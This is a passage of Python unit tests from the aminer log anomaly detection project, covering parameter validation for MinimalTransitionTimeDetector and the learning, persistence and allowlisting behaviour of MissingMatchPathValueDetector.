MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=1.0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=0.5) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=True) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MissingMatchPathValueDetectorTest.py000066400000000000000000001242221500476301700327120ustar00rootroot00000000000000import unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector, MissingMatchPathListValueDetector import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement, DummyFirstMatchModelElement from datetime import datetime, timezone from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class MissingMatchPathValueDetectorTest(TestBase): """Unittests for the MissingMatchPathValueDetector.""" expected_string = '%s Interval too large between values\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" def test1receive_atom_MissingMatchPathValueDetector(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ data = b" pid=" match_context = DummyMatchContext(data) fdme = DummyFixedDataModelElement("s1", data) fdme2 = DummyFixedDataModelElement("s2", data) match_element1 = fdme.get_match_element("match", match_context) match_context = DummyMatchContext(data) match_element2 = fdme2.get_match_element("match", match_context) mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) t = time.time() log_atom1 = LogAtom(fdme.data, ParserMatch(match_element1), t, mmpvd) log_atom2 = LogAtom(fdme.data, ParserMatch(match_element2), t, mmpvd) # learn_mode = True # check if the log atom is not processed if the path does not match. self.assertFalse(mmpvd.receive_atom(log_atom2)) # check if no anomaly is produced if the log atom is received in time. self.assertTrue(mmpvd.receive_atom(log_atom1)) passed_time = t + 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if anomalies are detected properly. passed_time += 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(passed_time).strftime(self.datetime_format_string), mmpvd.__class__.__name__, 1, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")) self.reset_output_stream() # multiple paths match_context = DummyMatchContext(data + data) seq = DummySequenceModelElement("model", [fdme, fdme2]) match_element = seq.get_match_element("match", match_context) mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/model", "match/model/s1", "match/model/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data + fdme.data, ParserMatch(match_element), 1, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) # learn_mode = False # check if a missing value is created without using the learn_mode (should not be the case). mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=False) self.assertFalse(mmpvd.receive_atom(log_atom2)) self.assertTrue(mmpvd.receive_atom(log_atom1)) passed_time = t + 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if anomalies are detected properly. passed_time += 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # combine_values = False # stop_learning_time mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) self.assertTrue(mmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertFalse(mmpvd.learn_mode) # stop_learning_no_anomaly_time mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=10000) log_atom1.atom_time = t self.assertTrue(mmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom2.atom_time = t + 100 self.assertFalse(mmpvd.receive_atom(log_atom2)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 3800 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 13800 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 13801 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertFalse(mmpvd.learn_mode) def test2receive_atom_MissingMatchPathListValueDetector(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # check if a missing value is created by a list without using the learn_mode. data = b" pid=" match_context = DummyMatchContext(data + data) fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("match", match_context) t = time.time() mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t + 4000, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmplvd.__class__.__name__, 1, "match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")) self.reset_output_stream() # check if the class returns wrong positives on lists, when the time limit should not be passed. mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) past_time = 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + past_time, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if missing values are reported correctly. mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) past_time = 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + past_time, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmplvd.__class__.__name__, 1, "match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")) # check if no anomaly is produced if the log atom is received in time. match_element = fdme.get_match_element("match3", match_context) mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler]) log_atom = LogAtom(fdme.data, ParserMatch(match_element), 1, mmplvd) self.assertFalse(mmplvd.receive_atom(log_atom)) def test3multiple_paths_data_from_file(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths with more data.""" description = "Test3MissingMatchPathValueDetector" with open("unit/data/multiple_pathes_mmpvd.txt", "rb") as f: data = f.readlines() host1 = DummyFixedDataModelElement("host1", b"host1 ") host2 = DummyFixedDataModelElement("host2", b"host2 ") service1 = DummyFixedDataModelElement("service1", b"service1") service2 = DummyFixedDataModelElement("service2", b"service2") seq11 = DummySequenceModelElement("seq11", [host1, service1]) seq12 = DummySequenceModelElement("seq12", [host1, service2]) seq21 = DummySequenceModelElement("seq21", [host2, service1]) seq22 = DummySequenceModelElement("seq22", [host2, service2]) first = DummyFirstMatchModelElement("first", [seq11, seq12, seq21, seq22]) mmpvd11 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq11", "match/first/seq11/host1", "match/first/seq11/service1"], [self.stream_printer_event_handler], "Default11", True, 480, 480) self.analysis_context.register_component(mmpvd11, description+"11") missing_match_path_value_detector12 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq12", "match/first/seq12/host1", "match/first/seq12/service2"], [self.stream_printer_event_handler], "Default23", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector12, description+"12") missing_match_path_value_detector21 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq21", "match/first/seq21/host2", "match/first/seq21/service1"], [self.stream_printer_event_handler], "Default21", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector21, description+"21") missing_match_path_value_detector22 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq22", "match/first/seq22/host2", "match/first/seq22/service2"], [self.stream_printer_event_handler], "Default22", True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector22, description+"22") t = 0 for line in data: split_line = line.rsplit(b" ", 2) date = datetime.strptime(split_line[0].decode(), "%Y-%m-%d %H:%M:%S") date = date.astimezone(timezone.utc) t = (date - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() # initialize the detectors and remove the first output. if mmpvd11.learn_mode is True: line = b"host1 service1host1 service2host2 service1host2 service2" match_context = DummyMatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11) mmpvd11.receive_atom(log_atom) mmpvd11.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) missing_match_path_value_detector12.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) missing_match_path_value_detector21.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) missing_match_path_value_detector22.learn_mode = False self.reset_output_stream() line = split_line[1] + b" " + split_line[2] match_context = DummyMatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11) res = mmpvd11.receive_atom(log_atom) if match_element.get_path() == "match/first/seq11": self.assertTrue(res) res = missing_match_path_value_detector12.receive_atom(log_atom) if match_element.get_path() == "match/first/seq12": self.assertTrue(res) res = missing_match_path_value_detector21.receive_atom(log_atom) if match_element.get_path() == "match/first/seq21": self.assertTrue(res) res = missing_match_path_value_detector22.receive_atom(log_atom) if match_element.get_path() == "match/first/seq22": self.assertTrue(res) # need to produce a valid match to trigger missing match paths. line = b"host1 service1host1 service2host2 service1host2 service2" match_context = DummyMatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, mmpvd11) mmpvd11.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) # exactly one overdue should be found msg = "2021-03-12 21:30:51 Interval too large between values\nMissingMatchPathValueDetector: \"Test3MissingMatchPathValue" \ "Detector11\" (1 lines)\n ['match/first/seq11', 'match/first/seq11/host1', 'match/first/seq11/service1']: \"['host1 " \ "service1', 'host1 ', 'service1']\" overdue 12s (interval 480)\n\n" self.assertEqual(msg, self.output_stream.getvalue()) def test4do_timer(self): """Test if the do_timer method is implemented properly.""" mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler]) t = time.time() mmpvd.next_persist_time = t + 400 self.assertEqual(mmpvd.do_timer(t + 200), 200) self.assertEqual(mmpvd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(mmpvd.do_timer(t + 999), 1) self.assertEqual(mmpvd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler]) t = time.time() mmplvd.next_persist_time = t + 400 self.assertEqual(mmplvd.do_timer(t + 200), 200) self.assertEqual(mmplvd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(mmplvd.do_timer(t + 999), 1) self.assertEqual(mmplvd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test5allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) data = b" pid=" t = time.time() match_context = DummyMatchContext(data) analysis = "Analysis.%s" fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, mmpvd) mmpvd.receive_atom(log_atom) self.assertRaises(Exception, mmpvd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # check in which cases an event is triggered and compares with expected results. self.assertEqual(mmpvd.allowlist_event(analysis % mmpvd.__class__.__name__, ("data", "match/s1"), 10), f"Updated 'data' in 'match/s1' to new interval 10.") self.assertEqual(mmpvd.expected_values_dict, {"[' pid=']": [t, 3600, 0, "['match/s1']"], "data": [t, 10, 0, "match/s1"]}) self.assertEqual(mmpvd.allowlist_event(analysis % mmpvd.__class__.__name__, ("data1", "match/s1"), -1), f"Updated 'data1' in 'match/s1' to new interval 3600.") self.assertEqual(mmpvd.expected_values_dict, {"[' pid=']": [t, 3600, 0, "['match/s1']"], "data": [t, 10, 0, "match/s1"], "data1": [t, 3600, 0, "match/s1"]}) mmpvd.learn_mode = False self.assertEqual(mmpvd.allowlist_event(analysis % mmpvd.__class__.__name__, ("data3", "match/s2"), 10), "Updated 'data3' in 'match/s2' to new interval 10.") self.assertEqual(mmpvd.expected_values_dict, {"[' pid=']": [t, 3600, 0, "['match/s1']"], "data": [t, 10, 0, "match/s1"], "data1": [t, 3600, 0, "match/s1"], "data3": [t, 10, 0, "match/s2"]}) def test6persistence(self): """ Test the do_persist and load_persistence_data methods. In this case the persistence of MissingMatchPathValueDetector and MissingMatchPathListValueDetector are the same, as the same methods are used. """ data = b" pid=" t = time.time() match_context = DummyMatchContext(data + b"22") fdme = DummyFixedDataModelElement("s1", data) fdme2 = DummyFixedDataModelElement("s2", b"22") match_element = fdme.get_match_element("match", match_context) match_element2 = fdme2.get_match_element("match", match_context) mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) mmpvd.do_persist() with open(mmpvd.persistence_file_name, "r") as f: self.assertEqual(f.read(), f"""{{"string:[' pid=']": [{int(round(t, 0))}, {mmpvd.default_interval}, 0, "string:['match/s1']"]}}""") mmpvd.expected_values_dict = {} mmpvd.load_persistence_data() self.assertEqual(mmpvd.expected_values_dict, {"[' pid=']": [int(round(t, 0)), mmpvd.default_interval, 0, "['match/s1']"]}) passed_time = 4000 other_mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + passed_time, other_mmpvd) self.assertTrue(other_mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmpvd.__class__.__name__, 1, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")) self.reset_output_stream() # combine_values = False mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, combine_values=False) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) mmpvd.do_persist() with open(mmpvd.persistence_file_name, "r") as f: self.assertEqual(f.read(), f"""{{"string: pid=": [{int(round(t, 0))}, {mmpvd.default_interval}, 0, "string:match/s1"]}}""") mmpvd.expected_values_dict = {} mmpvd.load_persistence_data() self.assertEqual(mmpvd.expected_values_dict, {" pid=": [int(round(t, 0)), mmpvd.default_interval, 0, "match/s1"]}) other_mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), other_mmpvd) self.assertTrue(other_mmpvd.receive_atom(log_atom)) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + passed_time, other_mmpvd) self.assertTrue(other_mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmpvd.__class__.__name__, 1, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")) self.reset_output_stream() # MissingMatchPathListValueDetector mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmpvd) log_atom2 = LogAtom(fdme2.data, ParserMatch(match_element2), round(t), mmpvd) self.assertTrue(mmplvd.receive_atom(log_atom2)) self.assertTrue(mmplvd.receive_atom(log_atom)) mmplvd.do_persist() with open(mmplvd.persistence_file_name, "r") as f: self.assertEqual(f.read(),f"""{{"string:22": [{int(round(t, 0))}, {mmplvd.default_interval}, 0, "string:match/s2"], "string: pid=": [{int(round(t, 0))}, {mmplvd.default_interval}, 0, "string:match/s1"]}}""") mmplvd.expected_values_dict = {} mmplvd.load_persistence_data() self.assertEqual(mmplvd.expected_values_dict, {" pid=": [int(round(t, 0)), mmplvd.default_interval, 0, "match/s1"], "22": [int(round(t, 0)), mmplvd.default_interval, 0, "match/s2"]}) other_mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), other_mmplvd) self.assertTrue(other_mmplvd.receive_atom(log_atom)) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + passed_time, other_mmplvd) self.assertTrue(other_mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmplvd.__class__.__name__, 1, "match/s1, match/s2: '22' overdue 400s (interval 3600)\n match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")) def test7validate_parameters(self): """ Test all initialization parameters for the detector. Input parameters must be validated in the class. In this case the checks for MissingMatchPathValueDetector and MissingMatchPathListValueDetector are the same, as the same constructor is used. """ self.assertRaises(TypeError, MissingMatchPathValueDetector, self.aminer_config, "default", [self.stream_printer_event_handler]) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(ValueError, MissingMatchPathValueDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) 